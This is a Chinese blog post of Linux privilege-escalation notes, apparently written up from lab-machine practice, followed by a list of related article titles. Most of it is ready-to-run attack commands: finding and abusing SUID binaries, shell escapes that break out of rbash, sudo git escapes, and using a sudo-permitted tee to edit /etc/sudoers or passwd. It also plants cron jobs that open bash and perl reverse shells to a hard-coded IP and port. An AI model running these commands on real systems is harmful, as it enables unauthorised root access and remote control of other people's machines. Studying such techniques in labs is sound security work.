1.suid提权

运行某些程序时暂时获得root的权限,例如ping(socket需要root才能运行)

搜索符合条件的可以用来提权的:

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} ;

find / -user root -perm -4000 -print 2>/dev/null

三种都可以

搜索可以提权的程序,一般有以下 :

nmap vim find Bash More Less Nano cp

举例:find提权

find / -perm -u=s -type f 2>/dev/null

发现find可以利用

普通用户,进入到/tmp目录下,然后新建一个文件。

touch abcd

find abcd -exec whoami ;

会发现已经是root权限

2.rbash绕过

rbash就是受限制的bash,一般管理员会限制很多命令,例如whoami cd cat等很多常用的命令,不过肯定会有命令可以使用,我们可以查看$PATH有哪些,或者自己挨个试

echo $PATH #查看自己可以使用的命令

less,ls,scp,vi 是我们可以用的

尝试用以下来绕过

#干就完事了

1.

vi test

:!/bin/sh

2.ed

3.ne

4. more less

more test

!'sh'

5.

man ls

操作同more less

6.find

/usr/bin/find /etc/passwd -exec whoami ;

/usr/bin/find /etc/passwd -exec /bin/sh ;

7.nmap

低版本

8.awk

awk 'BEGIN {system("/bin/sh")}'

9.python

python -c "import os;os.system('whoami')"

python -c "import os;os.system('/bin/sh')"

python -c "import pty;pty.spawn('/bin/sh')"

10.ruby

11.perl

12.php

13.

BASH_CMDS[a]=/bin/sh;a

最后用13成功绕过了rbash,进入了人sh

赶紧试试用/bin/bash进入bash,没有权限的提升,我就觉得这个好用,能用tab补全

执行:

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

或者:PATH=$PATH:/bin

PATH=$PATH:/usr/bin

就可以正常使用了

3.git提权

sudo git help config

!/bin/bash或者!'sh'完成提权

sudo git -p help

!/bin/bash

4.Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation

5.sudoer配置文件错误提权

5.1 基础知识

有的时候,普通用户经常要执行某个命令,但是经常需要sudo输入密码,我们就可以通过配置/etc/sudoers文件来实现普通用户某个命令权限的提升,但是如果一旦是给了用户写入的root权限,比如vi,那么这个普通用户一旦被入侵,就可以通过vi来提权

首先来看/etc/sudoers

chmod u+w /etc/shudoers

vi /etc/sudoers

看到这里

# User privilege specification

root ALL=(ALL:ALL) ALL

root:代表用户

第一个ALL:之网络中的主机,我也不知道什么意思,但是这个all还是不动好了

第二个(ALL:ALL):指以谁的身份去执行,root就行了

第三个ALL:指所有的命令,可以自己制定,比如/bin/ls,/bin/nc

看下面的图:

代表了用户zaq可以以root的权限运行ls指令

前边要加sudo,可以看到zaq用户成功查看了/root目录的结构

sudo -l 显示出自己(执行 sudo 的使用者)的权限

5.2 提权

如果这个/bin/ls变成了可以写入文件的命令会怎么办呢?比如:

/usr/bin/tee

这是在DC-4靶机上遇到的

#####################################################################

先看以下tee的用法

zaq@instance-f95a3vkt:/bin$ /usr/bin/tee --help

Usage: /usr/bin/tee [OPTION]... [FILE]...

Copy standard input to each FILE, and also to standard output.

-a, --append append to the given FILEs, do not overwrite

-i, --ignore-interrupts ignore interrupt signals

-p diagnose errors writing to non pipes

--output-error[=MODE] set behavior on write error. See MODE below

--help display this help and exit

--version output version information and exit

####################################################################

把输入写入文件,如果是-a的话就会在最后新起一行追加内容

1.corntab反弹shell

当 /bin/sh指向/bin/dash的时候(ubuntu默认这样,当前的靶机也是这样),反弹shell用bash的话得这样弹:

* * * * * root bash -c "bash -i >&/dev/tcp/106.13.124.93/2333 0>&1"

这样弹shell的时候不知道为什么很慢,耐心等等

或者:

*/1 * * * * root perl -e 'use Socket;$i="106.13.124.93";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

2.suid

值得注意的是:chmod 4777 /bin/bash不会有这种效果(曾经看到这个解答,我给忘了,你不用管为什么了,自己试试就好了)

3.passwd添加用户

test:x:0:0::/home/admin:/bin/bash

4.sudoers文件

echo "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers

Linux怎么对当前目录提权,linux提权方法(不断总结更新)相关推荐

  1. 提权—Linux 定时任务环境变量数据库

    Linux提权环境变量安全-(aliyun,本地): 前提:需要配合SUID进行环境变量提权且是本地用户环境下(因此该方法比较难实现,鸡肋) 提权过程:手写调用文件-编译-复制文件-增加环境变量-执行 ...

  2. linux 负数_linux内核提权系列教程(2):任意地址读写到提权的4种方法

    一.漏洞代码分析 代码见arbitrary.h. 1.功能函数介绍 功能 输入结构名 输入结构 功能 ARBITRARY_RW_INIT init_args size 初始化全局对象,存于g_mem_ ...

  3. linux漏洞知乎_Linux本地内核提权漏洞(CVE-2019-13272)

    0x00 简介 2019年07月20日,Linux正式修复了一个本地内核提权漏洞.通过此漏洞,攻击者可将普通权限用户提升为Root权限. 0x01 漏洞概述 当调用PTRACE_TRACEME时,pt ...

  4. 《WEB安全渗透测试》(27)Linux系统提权-SUID提权

    1.SUID提权介绍 提权,网络术语,指的是提高自己在服务器中的权限,如从普通用户提高到root用户,当网站被入侵后,攻击者会千方百计的去提高自己的权限,毕竟普通用户能干的事情太有限了. linux中 ...

  5. 6-vulnhub靶场-LordOfTheRoot_1.0.1靶机内核提权udf提权缓冲区溢出提权

    6-LordOfTheRoot_1.0.1 靶机地址 https://www.vulnhub.com/entry/lord-of-the-root-101,129/ 难度 中等(主要是缓冲区溢出) 1 ...

  6. 10-Stapler-可执行文件提权-内核提权-les.sh-linpeas.sh

    10-Stapler 靶机地址:https://www.vulnhub.com/entry/stapler-1,150/ 信息收集 nmap nmap 192.168.75.0/24 -sP ip 1 ...

  7. 如何让linux加载当前目录的动态库

    debian从7.0开始支持multiarch,64位库的路径改到/usr/lib/x86_64-linux-gnu了,mint.ubuntu这些衍生版有没有跟着改我就不清楚了. deepin lin ...

  8. linux shell判断当前目录下的文件或目录

    linux shell判断当前目录下的文件或目录 #!bin/sh for file in ./* doif test -f $filethenecho $file 是文件elseecho $file ...

  9. linux最上层目录是什么,Linux基础知识之--目录组成结构,当前目录及上层目录表示方法,目录访问权限...

    Linux系统中目录组成结构 • Linux系统的目录组成类拟一个倒置的树型结构,它以一个名为 根("/")的目录开始向下延伸 • 它不同与其它操作系统.例如windows,在 w ...

  10. navicat提权的两个方法(注册表+星号查看器)

    navicat是一个比较流行的MySQL管理工具,没想到还有密码问题,大家要注意下啊,服务器用完navicat就删除了吧 navicat成功提权的两个方法: 1.日志里找密码,navicat会把操作日 ...

最新文章

  1. 学计算机应用英语词汇,计算机应用常用英语词汇 10
  2. java.io.CharConversionException: Not an ISO 8859-1 character:
  3. 嵌入式新人发展的总体方向
  4. linux内核时间second,闰秒(leap second)和linux/unix时间
  5. SQL Server Compact的DLL文件介绍
  6. RecyclerView Item 布局宽高无效问题探究
  7. 洛谷P7518:宝石(倍增、可撤销并查集)
  8. 计算机专业毕业ppt怎么弄,计算机专业毕业生如何书写毕业论文.ppt
  9. 我的三年研究生(CS)学习与工作经历(ZT)
  10. win10 安装 mysql-8.0.12
  11. C++获取当前所有进程的完整路径
  12. imregionalmax
  13. XMind软件简易使用教程
  14. Pixhawk更换GPS协议 由默认ublox更换为NMEA GPGGA格式
  15. MLAPP————第十四章 核方法
  16. Exp9 Web安全基础 ————20164316张子遥
  17. YC全球总裁:我招揽陆奇好多年,如今终于如愿了!
  18. OneFlow 如何做静态图的算子对齐任务
  19. 计算机组成原理笔试,农村信用社招聘笔试--计算机组成原理重点总结.doc
  20. 点击按钮变成灰色不可再次点击

热门文章

  1. mk_trustonic.mk编译脚本
  2. optee的Share Memory介绍
  3. android密码解锁/指纹解锁返回的authToken深度解剖
  4. 关于MFC的CString 访问越界问题
  5. android省市二级联动的实现
  6. MySQL INNER JOIN:内连接查询
  7. 1.11实例:保存图书信息
  8. 1110 Complete Binary Tree (25 分)【难度: 一般 / 知识点: 判断完全二叉树】
  9. 蓝桥杯【介绍】和【如何准备才可以拿奖】
  10. 5.1.2 IO控制器